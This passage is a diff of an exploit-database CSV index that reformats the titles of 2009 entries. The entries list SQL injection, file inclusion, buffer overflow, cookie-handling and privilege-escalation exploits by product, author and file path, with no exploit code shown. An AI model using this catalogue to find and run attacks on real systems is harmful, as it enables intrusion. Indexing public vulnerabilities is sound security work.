-7278,7 +7278,7 @@ id,file,description,date,author,platform,type,port 7738,platforms/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,php,webapps,0 7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0 7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Remote File Upload",2009-01-12,ahmadbady,php,webapps,0 -7741,platforms/asp/webapps/7741.txt,"dMx READY (25 Products) Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0 +7741,platforms/asp/webapps/7741.txt,"dMx READY (25 - Products) Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0 7742,platforms/windows/dos/7742.txt,"Winamp 5.541 - (mp3/aiff) Multiple Denial of Services",2009-01-12,securfrog,windows,dos,0 7743,platforms/php/webapps/7743.txt,"Realtor 747 - (define.php INC_DIR) Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0 7744,platforms/asp/webapps/7744.txt,"Virtual GuestBook 2.1 - Remote Database Disclosure",2009-01-13,Moudi,asp,webapps,0 @@ -7385,7 +7385,7 @@ id,file,description,date,author,platform,type,port 7847,platforms/php/webapps/7847.txt,"Joomla Component beamospetition 1.0.12 - SQL Injection / XSS",2009-01-21,vds_s,php,webapps,0 7848,platforms/windows/local/7848.pl,"Browser3D 3.5 - (.sfs) Local Stack Overflow Exploit (Perl)",2009-01-22,AlpHaNiX,windows,local,0 7849,platforms/php/webapps/7849.txt,"OwnRS Blog 1.2 - (autor.php) SQL Injection",2009-01-22,nuclear,php,webapps,0 -7850,platforms/asp/webapps/7850.txt,"asp-project 1.0 Insecure Cookie Method",2009-01-22,"Khashayar Fereidani",asp,webapps,0 +7850,platforms/asp/webapps/7850.txt,"asp-project 1.0 - Insecure Cookie Method",2009-01-22,"Khashayar Fereidani",asp,webapps,0 7851,platforms/php/webapps/7851.php,"Pardal CMS 0.2.0 - Blind SQL Injection Exploit",2009-01-22,darkjoker,php,webapps,0 7852,platforms/windows/dos/7852.pl,"FTPShell Server 4.3 - (licence key) Remote Buffer Overflow PoC",2009-01-22,LiquidWorm,windows,dos,0 7853,platforms/windows/local/7853.pl,"EleCard MPEG PLAYER - (.m3u) Local Stack Overflow Exploit",2009-01-25,AlpHaNiX,windows,local,0 @@ -7405,10 +7405,10 @@ id,file,description,date,author,platform,type,port 7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - (index.php id) Blind SQL Injection Exploit",2009-01-26,fuzion,php,webapps,0 7868,platforms/windows/remote/7868.html,"FlexCell Grid Control 5.6.9 - Remote File Overwrite Exploit",2009-01-26,Houssamix,windows,remote,0 7869,platforms/windows/dos/7869.html,"MW6 Barcode ActiveX - (Barcode.dll) Reamote Heap Overflow PoC",2009-01-26,Houssamix,windows,dos,0 -7871,platforms/windows/remote/7871.html,"NCTVideoStudio ActiveX DLLs 1.6 Insecure Method File Creation Exploit",2009-01-26,Stack,windows,remote,0 +7871,platforms/windows/remote/7871.html,"NCTVideoStudio ActiveX DLLs 1.6 - Insecure Method File Creation Exploit",2009-01-26,Stack,windows,remote,0 7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - (Auth Bypass / SQL Injection) Multiple Vulnerabilities",2009-01-26,InjEctOr5,asp,webapps,0 7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0 -7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 (show_cat2.php grid) - SQL Injection",2009-01-26,FeDeReR,php,webapps,0 +7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - (show_cat2.php grid) SQL Injection",2009-01-26,FeDeReR,php,webapps,0 7875,platforms/windows/remote/7875.pl,"WinFTP 2.3.0 - (LIST) Remote Buffer Overflow Exploit (post-auth)",2009-01-26,"joe walko",windows,remote,21 7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - (username) Blind SQL Injection Exploit",2009-01-26,darkjoker,php,webapps,0 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0 @@ -7512,7 +7512,7 @@ id,file,description,date,author,platform,type,port 7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - (DD/XSS) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 7982,platforms/asp/webapps/7982.txt,"team 1.x - (DD/XSS) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - (forumID) Blind SQL Injection Exploit",2009-02-04,darkjoker,php,webapps,0 -7985,platforms/windows/dos/7985.pl,"Novell GroupWise 8.0 Malformed RCPT command Off-by-one Exploit",2009-02-04,"Praveen Darshanam",windows,dos,0 +7985,platforms/windows/dos/7985.pl,"Novell GroupWise 8.0 - Malformed RCPT command Off-by-one Exploit",2009-02-04,"Praveen Darshanam",windows,dos,0 7986,platforms/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - (Authorization) Stack BoF PoC",2009-02-04,"Praveen Darshanam",windows,dos,0 7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - (upload/bypass) Multiple Vulnerabilities",2009-02-04,JosS,php,webapps,0 7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow Exploit (xp)",2009-02-04,"Rob Carter",windows,remote,0 @@ -7578,12 +7578,12 @@ id,file,description,date,author,platform,type,port 8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary ASP File Upload / DB / SQL / XSS / CM",2009-02-12,"Aria-Security Team",asp,webapps,0 8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - (LFI/SQL) Multiple Vulnerabilities",2009-02-13,nuclear,php,webapps,0 8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - (id) SQL Injection",2009-02-13,JIKO,php,webapps,0 -8051,platforms/hardware/dos/8051.html,"Nokia N95-8 browser (setAttributeNode) Method Crash Exploit",2009-02-13,"Juan Yacubian",hardware,dos,0 +8051,platforms/hardware/dos/8051.html,"Nokia N95-8 - browser (setAttributeNode) Method Crash Exploit",2009-02-13,"Juan Yacubian",hardware,dos,0 8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution with RFI (c99) Exploit",2009-02-13,bd0rk,php,webapps,0 8053,platforms/php/webapps/8053.pl,"BlogWrite 0.91 - Remote FD / SQL Injection Exploit",2009-02-13,Osirys,php,webapps,0 8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - (info.php item) SQL Command Injection Exploit",2009-02-13,Osirys,php,webapps,0 8055,platforms/freebsd/local/8055.txt,"FreeBSD 7.0-RELEASE Telnet Daemon - Local Privilege Escalation Exploit",2009-02-16,kingcope,freebsd,local,0 -8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 Persistent XSS",2009-02-16,rAWjAW,php,webapps,0 +8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 - Persistent XSS",2009-02-16,rAWjAW,php,webapps,0 8058,platforms/windows/dos/8058.pl,"TPTEST 3.1.7 - Stack Buffer Overflow PoC",2009-02-16,ffwd,windows,dos,0 8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption PoC",2009-02-16,Nine:Situations:Group,windows,remote,0 8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0 @@ -7840,7 +7840,7 @@ id,file,description,date,author,platform,type,port 8328,platforms/php/webapps/8328.txt,"webEdition 6.0.0.4 - (WE_LANGUAGE) Local File Inclusion",2009-03-31,"Salvatore Fresta",php,webapps,0 8329,platforms/php/webapps/8329.txt,"JobHut 1.2 - Remote Password Change/Delete/Activate User",2009-03-31,"ThE g0bL!N",php,webapps,0 8330,platforms/php/webapps/8330.txt,"PHPRecipeBook 2.39 - (course_id) SQL Injection",2009-03-31,DarKdewiL,php,webapps,0 -8331,platforms/php/webapps/8331.txt,"vsp stats processor 0.45 (gamestat.php gameID) - SQL Injection",2009-03-31,Dimi4,php,webapps,0 +8331,platforms/php/webapps/8331.txt,"vsp stats processor 0.45 - (gamestat.php gameID) SQL Injection",2009-03-31,Dimi4,php,webapps,0 8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite",2009-03-31,DSecRG,windows,remote,0 8333,platforms/multiple/dos/8333.txt,"Sun Calendar Express Web Server - (DoS/XSS) Multiple Remote Vulnerabilities",2009-03-31,"Core Security",multiple,dos,0 8334,platforms/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 - Multiple Local File Inclusion",2009-04-01,ahmadbady,php,webapps,0 @@ -7956,7 +7956,7 @@ id,file,description,date,author,platform,type,port 8447,platforms/windows/dos/8447.txt,"Zervit Web Server 0.02 - Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0 8448,platforms/php/webapps/8448.php,"Geeklog 1.5.2 - savepreferences()/*blocks[] SQL Injection Exploit",2009-04-16,Nine:Situations:Group,php,webapps,0 8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - (Auth Bypass) SQL Injection",2009-04-16,Dns-Team,php,webapps,0 -8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0 +8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0 8451,platforms/windows/dos/8451.pl,"Apollo 37zz - (.m3u) Local Heap Overflow PoC",2009-04-16,Cyber-Zone,windows,dos,0 8452,platforms/windows/dos/8452.c,"Elecard AVC HD Player .XPL Stack Buffer Overflow (SEH) PoC",2009-04-16,"fl0 fl0w",windows,dos,0 8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c Bypass BBCode XSS Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0 @@ -7998,7 +7998,7 @@ id,file,description,date,author,platform,type,port 8489,platforms/windows/dos/8489.pl,"CoolPlayer Portable 2.19.1 - (.m3u) Local Stack Overflow PoC",2009-04-20,GoLd_M,windows,dos,0 8490,platforms/hardware/dos/8490.sh,"Addonics NAS Adapter - (bts.cgi) Remote Denial of Service (Post-Auth)",2009-04-20,h00die,hardware,dos,0 8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b (Insecure Cookie Handling) Blind SQL Injection Exploit",2009-04-20,YEnH4ckEr,php,webapps,0 -8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 +8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 8493,platforms/php/webapps/8493.txt,"fungamez rc1 - (ab/LFI) Multiple Vulnerabilities",2009-04-20,YEnH4ckEr,php,webapps,0 8494,platforms/php/webapps/8494.txt,"TotalCalendar 2.4 - (inc_dir) Remote File Inclusion",2009-04-20,DarKdewiL,php,webapps,0 8495,platforms/php/webapps/8495.pl,"e107 <= 0.7.15 - (extended_user_fields) Blind SQL Injection Exploit",2009-04-20,StAkeR,php,webapps,0 @@ -8055,12 +8055,12 @@ id,file,description,date,author,platform,type,port 8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - (category) SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0 8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0 8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 - (pmscript.php with) Local File Inclusion",2009-04-27,SirGod,php,webapps,0 -8550,platforms/php/webapps/8550.txt,"Teraway LinkTracker 1.0 Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 -8551,platforms/php/webapps/8551.txt,"Teraway FileStream 1.0 Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 -8552,platforms/php/webapps/8552.txt,"Teraway LiveHelp 2.0 Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 +8550,platforms/php/webapps/8550.txt,"Teraway LinkTracker 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 +8551,platforms/php/webapps/8551.txt,"Teraway FileStream 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 +8552,platforms/php/webapps/8552.txt,"Teraway LiveHelp 2.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 8553,platforms/php/webapps/8553.htm,"Teraway LinkTracker 1.0 - Remote Password Change Exploit",2009-04-27,"ThE g0bL!N",php,webapps,0 8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit",2009-04-27,His0k4,windows,remote,80 -8555,platforms/php/webapps/8555.txt,"ABC Advertise 1.0 Admin Password Disclosure",2009-04-27,SirGod,php,webapps,0 +8555,platforms/php/webapps/8555.txt,"ABC Advertise 1.0 - Admin Password Disclosure",2009-04-27,SirGod,php,webapps,0 8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.20 / 2.6.24 / 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0 8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 - (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injection",2009-04-28,YEnH4ckEr,php,webapps,0 @@ -8074,8 +8074,8 @@ id,file,description,date,author,platform,type,port 8566,platforms/php/webapps/8566.txt,"S-CMS 1.1 Stable (page) Local File Inclusion",2009-04-29,ZoRLu,php,webapps,0 8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,php,webapps,0 8568,platforms/windows/dos/8568.pl,"mpegable Player 2.12 - (.YUV) Local Stack Overflow PoC",2009-04-29,GoLd_M,windows,dos,0 -8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 -8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 +8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 - GetAnnots() Remote Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 +8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 - customDictionaryOpen() Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 8571,platforms/php/webapps/8571.txt,"Tiger Dms (Auth Bypass) SQL Injection",2009-04-29,"ThE g0bL!N",php,webapps,0 8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - UDEV < 141 Local Privilege Escalation Exploit (2)",2009-04-30,"Jon Oberheide",linux,local,0 8573,platforms/windows/dos/8573.html,"Google Chrome 1.0.154.53 - (Null Pointer) Remote Crash Exploit",2009-04-30,"Aditya K Sood",windows,dos,0 @@ -8084,7 +8084,7 @@ id,file,description,date,author,platform,type,port 8578,platforms/windows/dos/8578.pl,"Mercury Audio Player 1.21 - (.M3U) Local Stack Overflow PoC",2009-04-30,SirGod,windows,dos,0 8579,platforms/windows/remote/8579.html,"BaoFeng ActiveX OnBeforeVideoDownload() Remote BoF Exploit",2009-04-30,MITBOY,windows,remote,0 8580,platforms/windows/local/8580.py,"Mercury Audio Player 1.21 - (.b4s) Local Stack Overflow Exploit",2009-04-30,His0k4,windows,local,0 -8581,platforms/bsd/dos/8581.txt,"Multiple Vendor PF Null Pointer Dereference",2009-04-30,Rembrandt,bsd,dos,0 +8581,platforms/bsd/dos/8581.txt,"Multiple Vendor - PF Null Pointer Dereference",2009-04-30,Rembrandt,bsd,dos,0 8582,platforms/windows/local/8582.py,"Mercury Audio Player 1.21 - (.pls) SEH Overwrite Exploit",2009-04-30,His0k4,windows,local,0 8583,platforms/windows/local/8583.py,"Mercury Audio Player 1.21 - (.m3u) Local Stack Overflow Exploit",2009-05-01,His0k4,windows,local,0 8584,platforms/hardware/dos/8584.py,"Addonics NAS Adapter FTP Remote Denial of Service",2009-05-01,h00die,hardware,dos,0 @@ -8102,14 +8102,14 @@ id,file,description,date,author,platform,type,port 8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0 8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris - (dtrace) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0 8598,platforms/solaris/dos/8598.c,"Solaris 10 / OpenSolaris - (fasttrap) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0 -8599,platforms/php/webapps/8599.txt,"AGTC MyShop 3.2 Insecure Cookie Handling",2009-05-04,Mr.tro0oqy,php,webapps,0 +8599,platforms/php/webapps/8599.txt,"AGTC MyShop 3.2 - Insecure Cookie Handling",2009-05-04,Mr.tro0oqy,php,webapps,0 8600,platforms/php/webapps/8600.txt,"BluSky CMS - (news_id) SQL Injection",2009-05-04,snakespc,php,webapps,0 8601,platforms/windows/dos/8601.txt,"EW-MusicPlayer 0.8 - (.m3u) Local Buffer Overflow PoC",2009-05-04,SirGod,windows,dos,0 8602,platforms/php/webapps/8602.txt,"Qt quickteam Multiple Remote File Inclusion",2009-05-04,ahmadbady,php,webapps,0 8603,platforms/php/webapps/8603.php,"eLitius 1.0 - Remote Command Execution Exploit",2009-05-04,G4N0K,php,webapps,0 -8604,platforms/php/webapps/8604.txt,"PHP Site Lock 2.0 Insecure Cookie Handling",2009-05-04,"ThE g0bL!N",php,webapps,0 +8604,platforms/php/webapps/8604.txt,"PHP Site Lock 2.0 - Insecure Cookie Handling",2009-05-04,"ThE g0bL!N",php,webapps,0 8605,platforms/php/webapps/8605.txt,"Million Dollar Text Links 1.0 - Arbitrary Auth Bypass",2009-05-04,"ThE g0bL!N",php,webapps,0 -8606,platforms/windows/dos/8606.py,"Quick 'n Easy Mail Server 3.3 - (Demo) Remote Denial of Service PoC",2009-05-04,shinnai,windows,dos,0 +8606,platforms/windows/dos/8606.py,"Quick 'n Easy Mail Server 3.3 (Demo) - Remote Denial of Service PoC",2009-05-04,shinnai,windows,dos,0 8607,platforms/windows/dos/8607.pl,"Bmxplay 0.4.4b - (.BMX) Local Buffer Overflow PoC",2009-05-04,SirGod,windows,dos,0 8608,platforms/php/webapps/8608.txt,"projectcms 1.1b - Multiple Vulnerabilities",2009-05-04,YEnH4ckEr,php,webapps,0 8609,platforms/php/webapps/8609.pl,"Uguestbook 1.0b - (guestbook.mdb) Arbitrary Database Disclosure Exploit",2009-05-04,Cyber-Zone,php,webapps,0 @@ -8130,7 +8130,7 @@ id,file,description,date,author,platform,type,port 8624,platforms/windows/local/8624.pl,"Soritong MP3 Player 1.0 - Local Buffer Overflow Exploit (SEH)",2009-05-07,Stack,windows,local,0 8625,platforms/windows/dos/8625.pl,"Sorinara Streaming Audio Player 0.9 - (.PLA) Local Stack Overflow PoC",2009-05-07,GoLd_M,windows,dos,0 8626,platforms/php/webapps/8626.txt,"TCPDB 3.8 - Arbitrary Add Admin Account",2009-05-07,Mr.tro0oqy,php,webapps,0 -8627,platforms/asp/webapps/8627.txt,"T-Dreams Job Career Package 3.0 Insecure Cookie Handling",2009-05-07,TiGeR-Dz,asp,webapps,0 +8627,platforms/asp/webapps/8627.txt,"T-Dreams Job Career Package 3.0 - Insecure Cookie Handling",2009-05-07,TiGeR-Dz,asp,webapps,0 8628,platforms/windows/local/8628.pl,"RM Downloader 3.0.0.9 - (.RAM) Local Buffer Overflow Exploit",2009-05-07,G4N0K,windows,local,0 8629,platforms/windows/local/8629.pl,"Mini-stream ASX to MP3 Converter 3.0.0.7 - (.RAM) Buffer Overflow Exploit",2009-05-07,G4N0K,windows,local,0 8630,platforms/windows/local/8630.pl,"Mini-stream ASX to MP3 Converter 3.0.0.7 - (.ASX HREF) Local BoF Exploit",2009-05-07,G4N0K,windows,local,0 @@ -8171,19 +8171,19 @@ id,file,description,date,author,platform,type,port 8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0 8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0 -8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 Insecure Cookie Handling",2009-05-13,Mr.tro0oqy,php,webapps,0 +8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 - Insecure Cookie Handling",2009-05-13,Mr.tro0oqy,php,webapps,0 8669,platforms/multiple/dos/8669.c,"IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service PoC",2009-05-13,mu-b,multiple,dos,0 8670,platforms/windows/local/8670.php,"Pinnacle Studio 12 - (.hfz) Directory Traversal",2009-05-13,Nine:Situations:Group,windows,local,0 8671,platforms/php/webapps/8671.pl,"Family Connections CMS 1.9 - (member) SQL Injection Exploit",2009-05-13,YEnH4ckEr,php,webapps,0 8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 - (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0 8673,platforms/linux/local/8673.c,"Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - ptrace_attach Local Privilege Escalation Exploit",2009-05-13,s0m3b0dy,linux,local,0 8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 - (Auth Bypass / Cookie) SQL Injection",2009-05-13,Qabandi,php,webapps,0 -8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 Products Insecure Cookie Handling",2009-05-14,G4N0K,php,webapps,0 +8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 - Products Insecure Cookie Handling",2009-05-14,G4N0K,php,webapps,0 8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 - (Auth Bypass) SQL Injection",2009-05-14,"ThE g0bL!N",php,webapps,0 8677,platforms/windows/dos/8677.txt,"DigiMode Maya 1.0.2 - (.m3u / .m3l files) Buffer Overflow PoCs",2009-05-14,SirGod,windows,dos,0 8678,platforms/linux/local/8678.c,"Linux Kernel 2.6.29 - ptrace_attach() Local Root Race Condition Exploit",2009-05-14,prdelka,linux,local,0 8679,platforms/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple SQL Injection",2009-05-14,YEnH4ckEr,php,webapps,0 -8680,platforms/php/webapps/8680.txt,"beLive 0.2.3 (arch.php arch) - Local File Inclusion",2009-05-14,Kacper,php,webapps,0 +8680,platforms/php/webapps/8680.txt,"beLive 0.2.3 (arch.php arch) Local File Inclusion",2009-05-14,Kacper,php,webapps,0 8681,platforms/php/webapps/8681.php,"StrawBerry 1.1.1 - LFI / Remote Command Execution Exploit",2009-05-14,[AVT],php,webapps,0 8682,platforms/php/webapps/8682.txt,"MRCGIGUY ClickBank Directory 1.0.1 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0 8683,platforms/php/webapps/8683.txt,"Submitter Script (Auth Bypass) SQL Injection",2009-05-14,"ThE g0bL!N",php,webapps,0 @@ -8201,7 +8201,7 @@ id,file,description,date,author,platform,type,port 8696,platforms/hardware/remote/8696.txt,"D-Link Products Captcha Bypass",2009-05-15,"SourceSec Dev Team",hardware,remote,0 8697,platforms/php/webapps/8697.txt,"Joomla Component ArtForms 2.1 b7 - Remote File Inclusion",2009-05-15,iskorpitx,php,webapps,0 8698,platforms/windows/local/8698.pl,"Audioactive Player 1.93b - (.m3u) Local Buffer Overflow Exploit",2009-05-15,hack4love,windows,local,0 -8699,platforms/php/webapps/8699.php,"Harland Scripts 11 Products Remote Command Execution Exploit",2009-05-15,G4N0K,php,webapps,0 +8699,platforms/php/webapps/8699.php,"Harland Scripts 11 - Products Remote Command Execution Exploit",2009-05-15,G4N0K,php,webapps,0 8700,platforms/php/webapps/8700.txt,"Rama CMS 0.9.8 - (download.php) File Disclosure",2009-05-15,Br0ly,php,webapps,0 8701,platforms/windows/local/8701.py,"Audioactive Player 1.93b - (.m3u) Local Buffer Overflow Exploit (SEH)",2009-05-15,His0k4,windows,local,0 8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design - (SQL/XSS) Multiple Remote Vulnerabilities",2009-05-15,snakespc,php,webapps,0 @@ -8234,7 +8234,7 @@ id,file,description,date,author,platform,type,port 8732,platforms/windows/remote/8732.py,"httpdx 0.5b FTP Server - (CWD) Remote BoF Exploit (SEH)",2009-05-19,His0k4,windows,remote,21 8733,platforms/windows/remote/8733.html,"AOL IWinAmpActiveX Class ConvertFile() - Remote BoF Exploit",2009-05-19,rgod,windows,remote,0 8734,platforms/asp/webapps/8734.txt,"Namad (IMenAfzar) 2.0.0.0 - Remote File Disclosure",2009-05-19,Securitylab.ir,asp,webapps,0 -8735,platforms/php/webapps/8735.txt,"PAD Site Scripts 3.6 Insecure Cookie Handling",2009-05-19,Mr.tro0oqy,php,webapps,0 +8735,platforms/php/webapps/8735.txt,"PAD Site Scripts 3.6 - Insecure Cookie Handling",2009-05-19,Mr.tro0oqy,php,webapps,0 8736,platforms/php/webapps/8736.pl,"Coppermine Photo Gallery 1.4.22 - Remote Exploit",2009-05-19,girex,php,webapps,0 8737,platforms/php/webapps/8737.txt,"vidshare pro - (SQL/XSS) Multiple Vulnerabilities",2009-05-19,snakespc,php,webapps,0 8738,platforms/php/webapps/8738.txt,"Dog Pedigree Online Database 1.0.1b - Multiple SQL Injection",2009-05-19,YEnH4ckEr,php,webapps,0 @@ -8264,7 +8264,7 @@ id,file,description,date,author,platform,type,port 8763,platforms/php/webapps/8763.txt,"ZaoCMS Insecure Cookie Handling",2009-05-21,"ThE g0bL!N",php,webapps,0 8764,platforms/php/webapps/8764.txt,"ZaoCMS - (download.php) Remote File Disclosure",2009-05-21,"ThE g0bL!N",php,webapps,0 8765,platforms/windows/remote/8765.php,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (PHP)",2009-05-22,racle,windows,remote,0 -8766,platforms/php/webapps/8766.txt,"Tutorial Share 3.5.0 Insecure Cookie Handling",2009-05-22,Evil-Cod3r,php,webapps,0 +8766,platforms/php/webapps/8766.txt,"Tutorial Share 3.5.0 - Insecure Cookie Handling",2009-05-22,Evil-Cod3r,php,webapps,0 8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow PoC",2009-05-22,n00b,windows,dos,0 8769,platforms/php/webapps/8769.txt,"ZaoCMS (user_id) SQL Injection",2009-05-22,Qabandi,php,webapps,0 8770,platforms/windows/local/8770.py,"Winamp 5.55 - (MAKI script) Universal Seh Overwrite Exploit",2009-05-22,His0k4,windows,local,0 @@ -8396,7 +8396,7 @@ id,file,description,date,author,platform,type,port 8900,platforms/php/webapps/8900.txt,"Frontis 3.9.01.24 - (source_class) SQL Injection",2009-06-08,snakespc,php,webapps,0 8901,platforms/php/webapps/8901.txt,"virtue news - (SQL/XSS) Multiple Vulnerabilities",2009-06-08,snakespc,php,webapps,0 8902,platforms/php/webapps/8902.htm,"Grestul 1.2 - Remote Add Administrator Account Exploit",2009-06-08,"ThE g0bL!N",php,webapps,0 -8903,platforms/php/webapps/8903.txt,"DM FileManager 3.9.2 Insecure Cookie Handling",2009-06-08,"ThE g0bL!N",php,webapps,0 +8903,platforms/php/webapps/8903.txt,"DM FileManager 3.9.2 - Insecure Cookie Handling",2009-06-08,"ThE g0bL!N",php,webapps,0 8904,platforms/php/webapps/8904.txt,"automated link exchange portal 1.3 - Multiple Vulnerabilities",2009-06-08,TiGeR-Dz,php,webapps,0 8905,platforms/php/webapps/8905.txt,"Joomla Component com_portafolio - (cid) SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0 8906,platforms/php/webapps/8906.pl,"Shop Script Pro 2.12 - SQL Injection Exploit",2009-06-08,Ams,php,webapps,0 @@ -8469,7 +8469,7 @@ id,file,description,date,author,platform,type,port 8978,platforms/php/webapps/8978.txt,"fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption PoC",2009-06-17,StAkeR,php,webapps,0 8979,platforms/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusion",2009-06-17,YEnH4ckEr,php,webapps,0 8980,platforms/php/webapps/8980.py,"FretsWeb 1.2 - (name) Remote Blind SQL Injection Exploit",2009-06-17,YEnH4ckEr,php,webapps,0 -8981,platforms/php/webapps/8981.txt,"phportal 1.0 Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0 +8981,platforms/php/webapps/8981.txt,"phportal 1.0 - Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0 8982,platforms/linux/dos/8982.txt,"compface 1.5.2 - (.XBM) Local Buffer Overflow PoC",2009-06-17,metalhoney,linux,dos,0 8983,platforms/windows/local/8983.c,"DESlock+ 4.0.2 - dlpcrypt.sys Local Kernel ring0 Code Execution Exploit",2009-06-18,mu-b,windows,local,0 8984,platforms/php/webapps/8984.txt,"cms buzz - (XSS/pc/hi) Multiple 